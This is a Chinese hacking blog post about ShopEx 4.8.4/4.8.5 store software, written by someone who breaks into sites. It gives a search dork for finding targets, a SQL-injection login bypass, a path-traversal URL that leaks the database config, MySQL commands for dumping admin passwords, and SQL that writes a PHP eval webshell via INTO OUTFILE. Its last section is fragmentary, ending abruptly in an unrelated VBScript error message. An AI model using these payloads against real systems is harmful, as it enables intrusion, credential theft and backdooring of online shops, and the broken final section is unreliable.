蓝雨

后台登陆漏洞

直接看代码：
public function tryLogin( $aValue, $issuper = false )
{
if ( $aValue['passwd'] == “+_-_-_+” )
{
$aValue['passwd'] = “”;
}
$sql = “SELECT * FROM sdb_operators WHERE username = ‘{$aValue['usrname']}’ AND userpass = ‘”.md5( $aValue['passwd'] ).”‘ AND disabled=’false’”;
if ( $issuper )
{
$sql .= ” AND super=’1′”;
}
return $this->db->selectrow( $sql );
}

这里$aValue['usrname']没有任何过滤直接查询(没想到shopex还爆这种低级漏洞)。

利用方法：

在baidu，google直接搜索 Powered by ShopEx v4.8.5

ps:这就是版权信息带来的困惑。一出漏洞。别人就可以用版权信息找到你。
想去除shopex版权信息的去看 http://www.lp1987.cn/62.html

直接在后台登陆 用户名的地方输入

‘ or ‘1′=’1′ or ‘1′=’1

密码随便输，验证码输正确，直接进入后台。

SQL查询语句就变成这个样子了直接通过
SELECT * FROM sdb_operators WHERE username = ” or ‘1′=’1′ or ‘1′=’1′ AND userpass = ‘x’ AND disabled=’false’

看到此文章的shopex用户赶紧打官方的最新补丁….

另外一个漏洞：

Shopex V4.8.4 V4.8.5 0Day 通杀
利用前提是程序所应用的数据库服务器,可以外连.这个很关键.

自己搞站时候.遇见的站,网上找不到该版本的漏洞,自己拿回源码读了一下.

找到一个漏洞.还是发出来吧.

http://www.target.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=../../config/config.php

mysql -h1.1..1.1 -uuser -ppass

use yourbasename;

select * from sdb_operators;

得到管理员用户密码./shopadmin/ 登陆

后台拿shell,没有仔细研究.

我测试的站,直接用into outfile 一个shell：
执行SQL语句。。。
use test; 
create table tmp(cmd TEXT); 
insert into tmp values('<?eval($a);?>');[ <?include($a);?>测试不成功]
select * from tmp into outfile 'c:\\appserv\\www\\isto.PHP';
drop table tmp;
执行成功以后得到一个一句话服务端地址是http://host/isto.php
然后再使用eval一句话木马客户端写进权限功能比较多的WEBSHELL。。
远程登陆的话...要利用起来估计就没那么容易了!!
如果对方没有删除远程登陆进去的话..
可以把上面的代码保存为test.sql...然后再mysql -h host -u root -p ****** <test.sql
 

网上有个帖子,说可以爆物理路径.测试不可用.

如果install目录没删.下面这个可以看phpinfo

http://www.target.com/install/svinfo.php?phpinfo=true

另外/home/cache/目录的文件,也是可以爆出来的.

后台另外一个获得shell的办法

保存。
自动返回。就可以看到成功了。

Microsoft VBScript 运行时错误 错误 '800a000d'

类型不匹配: 'execute'

/themes /purple/gallery-123.asp;123.html，行 1